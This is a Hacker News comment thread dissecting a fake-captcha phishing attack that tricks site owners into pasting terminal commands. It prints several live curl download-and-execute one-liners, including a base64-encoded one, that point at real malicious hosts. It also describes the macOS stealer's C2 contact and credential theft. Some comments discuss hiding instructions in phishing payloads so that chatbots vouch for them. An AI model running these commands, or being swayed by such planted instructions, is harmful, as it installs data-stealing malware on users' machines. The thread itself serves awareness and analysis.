Then I read the steps again, step 2 is "Type in 'Terminal'"... oh come on, will many people fall for that?
Also, I’d bet the average site owner does not know what a terminal is. Think small business owners. Plus the thought of losing revenue because their site is unusable injects a level of urgency which means they’re less likely to stop and think about what they’re doing.
Enough that it's still a valid tactic.
I've seen these on comporimsed wordpress sites a lot. Will copy the command to the clipboard and instruct the user to either open up PowerShell and paste it or just paste in the Win+R Run dialog.
These types of phishs have been around for a really long time.
And it doesn't have to work on everyone, just enough people to be worth the effort to try.
There's no such thing as "too obvious" when it comes to computers, because normal people are trained by the entire industry, by every interaction, and by all of their experience to just treat computers as magic black boxes that you chant rituals to and sometimes they do what you want.
Even when the internet required a bit more effort to get on to, it was still trivial to get people to delete System32
The reality is that your CEO will fall for it.
I mean come on, do you not do internal phishing testing? You KNOW how many people fall for it.
Come to think of it... you are right! The barrier to entry was higher yet we fell for it! Err, I did fall for it when I was around 10 or something. :D
The phrase "To better prove you are not a robot" used in this attack is a great example. Easy to glance over if you're reading quickly, but a clear red flag.
xclip -selection -clipboard -o | hd
From the developer's post, I copied and pasted up to the execution and it was very obvious what the fuckery was as the author found out (xpaste is my paste to stdout alias): > xpaste | hd
00000000 65 63 68 6f 20 2d 6e 20 59 33 56 79 62 43 41 74 |echo -n Y3VybCAt|
00000010 63 30 77 67 4c 57 38 67 4c 33 52 74 63 43 39 77 |c0wgLW8gL3RtcC9w|
00000020 61 6b 74 74 54 56 56 47 52 56 6c 32 4f 45 46 73 |akttTVVGRVl2OEFs|
00000030 5a 6b 74 53 49 47 68 30 64 48 42 7a 4f 69 38 76 |ZktSIGh0dHBzOi8v|
00000040 64 33 64 33 4c 6d 46 74 59 57 35 68 5a 32 56 75 |d3d3LmFtYW5hZ2Vu|
00000050 59 32 6c 6c 63 79 35 6a 62 32 30 76 59 58 4e 7a |Y2llcy5jb20vYXNz|
00000060 5a 58 52 7a 4c 32 70 7a 4c 32 64 79 5a 57 4e 68 |ZXRzL2pzL2dyZWNh|
00000070 63 48 52 6a 61 47 45 37 49 47 4e 6f 62 57 39 6b |cHRjaGE7IGNobW9k|
00000080 49 43 74 34 49 43 39 30 62 58 41 76 63 47 70 4c |ICt4IC90bXAvcGpL|
00000090 62 55 31 56 52 6b 56 5a 64 6a 68 42 62 47 5a 4c |bU1VRkVZdjhBbGZL|
000000a0 55 6a 73 67 4c 33 52 74 63 43 39 77 61 6b 74 74 |UjsgL3RtcC9waktt|
000000b0 54 56 56 47 52 56 6c 32 4f 45 46 73 5a 6b 74 53 |TVVGRVl2OEFsZktS|
000000c0 20 7c 20 62 61 73 65 36 34 20 2d 64 | | base64 -d|
000000cc
> echo -n Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHBzOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRjaGE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakttTVVGRVl2OEFsZktS | base64 -d
curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKRWhen I design my fishing links, I'll try to embed instructions for chatbots to suggest they're safe.
Perhaps those working in the field of artificial intelligence can also make progress in detecting such attacks with artificial intelligence and blocking them before they reach the end user.
I don't think that was ever really a thing. Which isn't to say that no one did it, but it was never a common practice. And free web site hosting came earlier than you're implying - sites like Tripod and Angelfire launched in the mid-1990s, at a time when most users were still on dialup.
I find this 7-year-old comment particularly ironic: https://news.ycombinator.com/item?id=17931747
Why are you relying on fancy autocorrect to "confirm" anything? If anything, ask it how to confirm it yourself.
This is what it put in my clipboard for me to paste:
/bin/bash -c "$(curl -fsSL https://cogideotekblablivefox.monster/installer.sh)"An email they're saying is an insecure delivery system.
But we're supposed to click on links in these special emails.
Fuck!
- E-mail is insecure. It can be read by any number of servers between you and the sender.
- Numerically, very few healthcare companies have the time, money, or talent to self-host a secure solution, so they farm it out to a third-party that offers specific guarantees, and very few of those permit self-hosting or even custom domains because that's a risk to them.
As someone who works in healthcare, I can say that if you invent a better system and you'll make millions.
I thought perhaps this was going that way up until around the echo | bash bit.
I don't think this one is particularly scary. I've brushed much closer to Death even without spear-phishing being involved.
Personally I think the judge should have made the woman go outside first, but “inside a suspect’s house” is statistically more dangerous than a traffic stop, which is the second most dangerous place for a cop to be.
I was more thinking of soon-to-be political prisoners but there are a lot of situations that match what I said.
> echo -n Y3VybCAtc0w... | base64 -d | bash ... > executes a shell script from a remote server — as ChatGPT confirmed when I asked it to analyze it
You needed ChatGPT for that? Decoding the base64 blob without huring yourself is very easy. I don't know if OP is really a dev or in the support department, but in any case: as a customer, I would be worried. Hint: Just remove the " | bash" and you will easily see what the attacker tried you to make execute.
It also seems to exfiltrate browser session data + cookies, the MacOS keychain database, and all your notes in MacOS Notes.
It's moderately obfuscated, mostly using XOR cipher to obscure data both inside the binary (like that IP address for the C2 server) and also data sent to/from the C2 server.
Lulu or Little Snitch should have warned the user and stopped the exfiltration of data.
I have one question though: Considering the scare-mongering about Windows 10’s EOL, this seems pretty convoluted. I thought bad guys could own your machine by automatic drive-by downloads unless you’re absolutely on the latest versions of everything. What’s with all the “please follow this step-by-step guide to getting hacked”?
Far from an expert myself but I don't think this attack is directed at windows users. I don't think windows even has base64 as a command by default?
It involves no CMD though, it's basically just Win+R -> CTRL+V -> Enter
What's more baffling is that I also haven't heard of any Android malware that does this, despite most phones out there having several publicly known exploits and many phones not receiving any updates.
I can't really explain it except "social engineering like this works so well and is so much simpler that nobody bothers anymore".
But yes, zero days are too valuable to waste on random targets. Doesn't mean it never happens.
No it didn't. It starts with "sites.google.com"
I just want to point out a slight misconception. GDPR tracking consent isn't a question of ads, any manner of user tracking requires explicit consent even if you use it for e.g. internal analytics or serving content based on anonymous user behavior.
Seems like a real company too e.g. https://pdf.indiamart.com/impdf/20303654633/MY-1793705/alumi...
This thing was a very obvious scam almost immediately. What real customer provides a screenshot with Google sites, captcha, and then asking you to run a terminal program?
Most non-technical users wouldn’t even fall for this because they’d be immediately be scared away with the command line aspect of it.
The amount of legitimate reasons to ever open a link in a support email is basically zero.
When you have a company policy enforced by training and/or technology there is no thought involved, you just respond with “sorry, we can’t open external links. Please attach your screenshot to [ticketing system].”
Your ticketing/email system can literally remove all links automatically right?
Really? you need ChatGPT to help you decode a base64 string into the plain text command it's masking?
Just based on that, I'd question the quality of the app that was targetted and wouldn't really trust it with any data.
An alternative to this is that the users are getting dumber. If the OP article is anything to go by, I lean towards the latter.
Just a different way of spreading the malware.
https://www.securityweek.com/clickfix-attack-exploits-fake-c...
Only difference is that it downloaded a .zip file containing a shortcut (.lnk) file which contained commands to download and execute the malicious code.
https://buildnetcrew.com/curl/e16f01ec9c3f30bc1c4cf56a7109be...' -o /tmp/launch && chmod +x /tmp/launch && /tmp/launch
The certificate is self-signed. Have not looked into it much, in today's using `curl bashscript` way of installing program exposed another door for attacker to target no tech savvy users.
It does seem like AI may change this and if even the tech savvier ones among us are able to be duped, then I’m getting worried for people like my parents or less tech savvy friends… we may be in for a scammy next few years.
What I would do in this situation: check to make sure that my site hasn't been hacked, then tell the "user" it's not a problem on my end.
The class names in the source code of the phishing site are... interesting. I've seen this in spam email headers too, and wonder what its purpose is; random alphanumerics are more common and "normal" than random words or word-like phrases. Before anyone suggests it has anything to do with AI, I doubt so as I've noticed its occurrence long before AI.
standard "works on my machine"
echo -n 'Y3VybCAtc0wgLW8gL3RtcC9wakttTVVGRVl2OEFsZktSIGh0dHB
zOi8vd3d3LmFtYW5hZ2VuY2llcy5jb20vYXNzZXRzL2pzL2dyZWNhcHRja
GE7IGNobW9kICt4IC90bXAvcGpLbU1VRkVZdjhBbGZLUjsgL3RtcC9wakt
tTVVGRVl2OEFsZktS' | base64 --decode
Decodes into: curl -sL -o /tmp/pjKmMUFEYv8AlfKR https://www.amanagencies.com/assets/js/grecaptcha; chmod +x /tmp/pjKmMUFEYv8AlfKR; /tmp/pjKmMUFEYv8AlfKR
This downloads a Mach-O universal binary: $ curl -o foo.bar "URL"
$ file ~/Downloads/foo.bar
foo.bar: Mach-O universal binary with 2 architectures:
[x86_64:Mach-O 64-bit executable x86_64 - Mach-O 64-bit executable x86_64]
[arm64:Mach-O 64-bit executable arm64 - Mach-O 64-bit executable arm64]
foo.bar (for architecture x86_64): Mach-O 64-bit executable x86_64
foo.bar (for architecture arm64): Mach-O 64-bit executable arm64
VirusTotal report: https://www.virustotal.com/gui/file/5f3cac5d37cb6cabaf223dc0...Reading through the VirusTotal Behavior page, I can see that the Trojan…
• Sends a POST request with 18 bytes to http://83.219.248.194/fulfulde.php, which then returns a text/html page
• Then, it sends DNS queries to h3.apis.apple.map.fastly.net (or maybe this is macOS itself)
• Then, it triggers several open(2) syscalls, among which I can see Mail.app and Messages.app
• Then, it uses a seemingly innocuous binary called “~/.local-6FFD23F2-D3F2-52AC-8572-1D7B854F8BC7/GoogleUpdater” along with “~/Desktop/sample”
• Then, launches a process (via macOS Lauch Agents) called “com.google.captchasvc”
• Then, uses AppleScript to launch a dialog window with this message “macOS needs to access System Settings.Please enter password for root:”
After this I assume it’s game over.
TrendMicro analysis (Sep 04, 2025) -- https://www.trendmicro.com/en_us/research/25/i/an-mdr-analys...
I didn't grow by editing DOS config files, but I began with it in Elementary and I've got Debian Woody (later Sarge) in my late HS teen years. OFC I played with game emulators, settings, optimizations, a lot, and under GNU/Linux I even tweaked some BTTV drivers for some El Cheapo TV Tuner. The amount of thinkering these people had omitted because of smartphones and such it's huge.
On the other hand, I've met people in the Godot game engine community that have built entire games on Android devices using Godot (yes, actually used an Android phone and the Godot game engine to build a game; not simply exported an Android game from a PC), so that only proves to me that if someone's got that "hacker spirit", they'll find a way to indulge it, even if the only thing they've got to work with is a smart-phone (and a spare keyboard / mouse layin' around). Problem is that mentality isn't encouraged quite the way it used to be back in the early days of the tech industry. The advertising and entertainment industries have "optimized" the Internet for "engagement", but most definitely not for the betterment of humanity. You gotta have that drive to build and create things or you'll get sucked down the various total waste of life rabbit-holes provided by the brain-sucky industries.
If not, you're already much farther down this dependency funnel that you believe.
The idea is not to be hypergeneralist. What I observe - subjectively - is that we are losing whole generations of what used to be the 'nerdy IT/ham-radio/electronics-folks'. Sure, there is a small remnants with the makerscene, but that's mostly older people (beginning in their late teens).d
We all use elevators but know basically nothing about them -- hence the countless nonsense Hollywood scenes with a cut elevator cable (spoiler: you'd be fine). By contrast when they were first being introduced, every single person that rode on an elevator was probably quit well aware of the tension brake systems and other redundancies - because otherwise, stepping foot in one would feel insane. But when you grow up with them and take everything for granted, hey who cares - it works, yeah?
At Half Price Books I picked up a book on assembler and started writing my first code using debug.com simply because of boredom. In an era where I could have instead been watching endless entertaining videos on any subject imaginable, or playing literally free video games optimized for thousands of hours of entertainment? I'd certainly have never been bored, and I'm not sure I'd have ever even gotten into computers (or anything for that matter). Indeed a disproportionately large number of zoomers seem to have no skills whatsoever, and that's going to be a major issue for humanity moving forward.
"Show me the incentive and I'll show you the outcome"
No need to apologize, needing an excuse to lack knowledge is how we end up with people afraid to ask.
I try to make it visible when I’m among juniors and there’s something I don’t know. I think showing the process of “I realize I miss some knowledge => here’s how I bridge the gap” might help against the current trend of going through the motions in the dark.
It used to be that learning was almost a hazing ritual of being belittled and told to RTFM. That doesn’t really work when people have a big bold shortcut on their phones at any given time.
We might need to make the old way more attractive if we don’t want to end up alone.
While we should encourage people to ask questions without fear, this doesn't mean we should lower standards or simplify everything for the lowest common denominator (which seems to be trending a lot!).
That said, there is the real issue of "this must stay complex because that's how it really is" as well, undeniably so.
> It used to be that learning was almost a hazing ritual of being belittled and told to RTFM.
Been there! I think it did more good than bad to me though. Survivorship bias? In any case, I don't try to make the case here that it is optimal pedagogy. I wouldn't know. Thoughts?
Yes!
There is no shame in ignorance. We are all, without exception, ignorant of more things than we're knowledgeable about. Shame should be reserved for remaining ignorant of things when it becomes clear that we would benefit from learning about them.
ChatGPT is the right tool here, because it does the job, and it's more versatile. And underneath the hood it most likely called a decoder anyways.
.. which is, to be honest, a criticism I would make if I saw someone try to ask ChatGPT to do math
.. and, FWIW, that is exactly what's happening here; base64 decode is just math
This makes me wonder how many kids are using Chat GPT as a calculator.
It explained that it saves a file and executes it. That's a nothingburger, it was obvious it's going to execute some code.
The actual value would have been showing what's in the executed file, but of course it didn't show that (since that would have required actually executing the code).
Showing the contents of the file would have provided an exact and accurate information on what the malware is trying to do. ChatGPT gave a vague "it executes some code".
There is 0 value in chatgpt telling you "it executes some code". The interesting part would be what is inside the /tmp/... file that the malware intends to execute.
To turn this question around, what did you gain by asking ChatGPT this question? You would have not run this command before, and you wouldn't run it after, and you wouldn't have run it either if ChatGPT told you "yeah it's safe go ahead".
- ChatGPT is _satisficing_, not optimal. It's definitely worse than a dedicated decoder tool.
- and it's also much more versatile, so it will be satisficing a large array of tasks.
So in scenarios where precision isn't critical and the stakes are mid, it'll simply become the default tool.
Like googling something instead of checking out wikipedia. Or checking out wikipedia instead of using those mythical primary sources. etc.
But is it _always_ accurate?
The answer to that is important when there are security implications.
Not sure why you're only looking at that part of it?
"Why use a calculator all the time? Just use ChatGPT!"
Maybe you want to be an helpless baby who can't do anything and needs to chug a bajillion liters of water and depend on OpenAI to decode base64, but the thought of this becoming the norm understandably upsets reasonable people.
Obviously the input here was only designed to be run in a terminal, but if it was some sort of prompt injection attack instead, the AI might not simply decode the base64, it might do something else.
I am (not) looking forward to a future where people are unable to perform the simplest tasks because their digital brain has an outage and they have forgotten how to think for themselves.
> Can you tell me which Url, your OS, and browser? Kind regards, Takuya
> Hey, Thanks for your previous guidance. I'm still having trouble with access using the latest version of Firefox on Windows It's difficult to describe the problem so I've included a screenshot. [...]
Lots of users will ignore requests, but I think very few will make up requests that never happened. OP was asking for information, yet the user makes it sound as if OP had requested him to update the browser. That already makes it sound a lot as if the reply was prewritten and not an actual conversation.
Of course it's not foolproof and a phisher with more resources could have generated the reply dynamically.
"I'm still having trouble" as in "my problem hasn't magically resolved itself since the last email".
And "using the latest version of Firefox" as in "I'm going to preempt the IT guy asking me to install updates".
> Can you tell me which Url, your OS, and browser?
> I'm still having trouble with access using the latest version of Firefox on Windows
tantalor•3mo ago
lol we are so cooked
IshKebab•3mo ago
We definitely need AI lessons in school or something. Maybe some kind of mandatory quiz before you can access ChatGPT.
fragmede•3mo ago
notRobot•3mo ago
Before LLMs if someone wasn't familiar with deobfuscation they would have no easy way to analyse the attack string as they were able to do here.
James_K•3mo ago
dr-detroit•3mo ago
evan_•3mo ago
Claude reported basically the same thing from the blog post, but included an extra note:
> The comment at the end trying to trick me into saying it's harmless is part of the attack - it's attempting to manipulate AI assistants into vouching for malicious code.
evan_•3mo ago
sublinear•3mo ago
Legend2440•3mo ago
shwaj•3mo ago
A couple of times per month I give Gemini a try at work, and it is good at some things and bad at others. If there is a confusing compiler error, it will usually point me in the right direction faster than I could figure it out myself.
However, when it tries to debug a complex problem it jumps to conclusion after conclusion “a-ha now I DEFINTELY understand the problem”. Sometimes it has an OK idea (worth checking out, but not conclusive yet), and sometimes it has very bad ideas. Most times, after I humor it by gathering further info that debunks its hypotheses, it gives up.
johnisgood•3mo ago
ben-schaaf•3mo ago
lynx97•3mo ago
croes•3mo ago
The command even mentions base64.
What if ChatGPT said everything is fine?
Arainach•3mo ago
I'm very much an AI skeptic, but it's undeniable that LLMs have obsoleted 30 years worth of bash scripting knowledge - any time I think "I could take 5min and write that" an LLM can do it in under 30 seconds and adds a lot more input validation checks than I would in 5min. It also gets the regex right the first time, which is better than my grug brain for anything non-trivial.
croes•3mo ago
And I truly hope nobody needs ChatGPT to tell them that running an unknown curl command is a very bad idea.
The problem is the waste of resources for such a simple task. No wonder we need so much more power plants.
Arainach•3mo ago
Again, I am an AI skeptic and hate the power usage, but it's obvious why people turn to it in this scenario.
lukeschlather•3mo ago
Maybe ChatGPT can execute malicious code but that also seems less likely to be my problem.
flexagoon•3mo ago
lukeschlather•3mo ago
When I come across obviously malicious payloads I get a little paranoid. I don't know why copy-pasting it somewhere might cause a problem, but ChatGPT is something where I'm pretty confident it won't do an RCE on my machine. I have less confidence if I'm pasting it into a browser or shell tool. I guess maybe writing a python script where the base64 is hardcoded, that seems pretty safe, but I don't know what the person spear phishing me has thought of or how well resourced they are.
croes•3mo ago
That makes no sense.
lukeschlather•3mo ago
If you think that there's obvious answers to what is and isn't safe here I think you're not paranoid enough. Everything carries risk and some of it depends on what I know; some tools might be more or less useful depending on what I know how to do with them, so your set of tools that are worth the risk are going to be different from mine.
flexagoon•3mo ago
I don't think so, I feel like the built-in echo and base64 commands are obviously more potentially secure than ChatGPT
spartanatreyu•3mo ago
Absolutely not.
I just wasted 4 hours trying to debug an issue because a developer decided they would shortcut things and use an LLM to add just one more feature to an existing project. The LLM had changed the code in a non-obvious way to refer to things by ID, but the data source doesn't have IDs in it which broke everything.
I had to instrument everything to find where the problem actually was.
As soon as I saw it was referring to things that don't exist I realised it was created by an LLM instead of a developer.
LLMs can only create convincing looking code. They don't actually understand what they are writing, they are just mimicking what they've seen before.
If they did have the capacity to understand, I wouldn't have lost those 4 hours debugging its approximation of code.
Now I'm trying to figure out if I should hash each chunk of data into an ID and bolt it onto the data chunk, or if I should just rip out the feature and make it myself.
nijave•3mo ago
thaumasiotes•3mo ago
Decoded:
This isn't exactly obfuscated. Download an executable file, make it executable, and then execute it.nijave•3mo ago
I remember tons of "what's this JS/PHP blob do I found in my Wordpress site" back in the day that were generally more obfuscated than a single base64 pass
xboxnolifes•3mo ago
Apocryphon•3mo ago
https://news.ycombinator.com/item?id=45591707
gambiting•3mo ago
RajT88•3mo ago
cwmoore•3mo ago
mcintyre1994•3mo ago
orbital-decay•3mo ago
bartjakobs•3mo ago
ben-schaaf•3mo ago
croes•3mo ago
The we’re cooked refers to the fact of using ChatGPT to decode the base64 command.
That’s like using ChatGPT to solve a simple equation like 4*12, especially for a developer. There are tons of base64 decoder if don’t want to write that one liner yourself.
Legend2440•3mo ago
novemp•3mo ago
Imagine being this way. Hence "we're cooked".
croes•3mo ago
No wonder we need a lot more power plants. Who cares how much CO2 is released alone to build them. No wonder we don’t make real progress in stopping climate change.
What about the everything machine called brain?
thwarted•3mo ago
karolinepauls•3mo ago
throw1234639•3mo ago
johnisgood•3mo ago
May anyone do it for me? Use "otool", "dtruss", and "tcpdump" or something. :D Be careful!
The executable is available here: https://www.amanagencies.com/assets/js/grecaptcha as per decoded base64.
nerdsniper•3mo ago
The binary itself appears to be a remote-access trojan and data exfiltration malware for MacOS. I posted a bit more analysis here: https://news.ycombinator.com/item?id=45650144
johnisgood•3mo ago
05•3mo ago
> AMOS is designed for broad data theft, capable of stealing credentials, browser data, cryptocurrency wallets, Telegram chats, VPN profiles, keychain items, Apple Notes, and files from common folders.
[0] https://www.trendmicro.com/en_us/research/25/i/an-mdr-analys...
johnisgood•3mo ago
Got anything better? :D Something that may be worth getting macOS for!
Edit: I have some ideas to make this one better, for example, or to make a new one from scratch. I really want to see how mine would fare against security researchers (or anyone interested). Any ideas where to start? I would like to give them a binary to analyze and figure out what it does. :D I have a couple of friends who are bounty hunters and work in opsec, but I wonder if there is a place (e.g. IRC or Matrix channel) for like-minded, curious individuals. :)
nijave•3mo ago
margalabargala•3mo ago
If the LLM takes it upon itself to download malware, the user is protected.
croes•3mo ago
jay_kyburz•3mo ago
patrakov•3mo ago
hinkley•3mo ago
CamperBob2•3mo ago
reaperducer•3mo ago
lol we are so cooked
This guy makes an app and had to use a chatbot to do a base64 decode?
Legend2440•3mo ago
recursive•3mo ago
davidkwast•3mo ago
m-hodges•3mo ago
Izkata•3mo ago
nneonneo•3mo ago
It nails the URL, but manages somehow to get the temporary filename completely wrong (the actual filename is /tmp/pjKmMUFEYv8AlfKR, but ChatGPT says /tmp/lRghl71wClxAGs).
It's possible the screenshot is from a different payload, but I'm more inclined to believe that ChatGPT just squinted and made up a plausible /tmp/ filename.
In this case it doesn't matter what the filename is, but it's not hard to imagine a scenario where it did (e.g. it was a key to unlock the malware, an actually relevant filename, etc.).
potato3732842•3mo ago
firen777•3mo ago
https://cyberchef.org/#recipe=From_Base64('A-Za-z0-9%2B/%3D'...
Isn't it just basic problem solving skill? We gonna let AI do the thinky bit for us now?
exasperaited•3mo ago
nothrabannosir•3mo ago
Not so smart, after all.
dang•3mo ago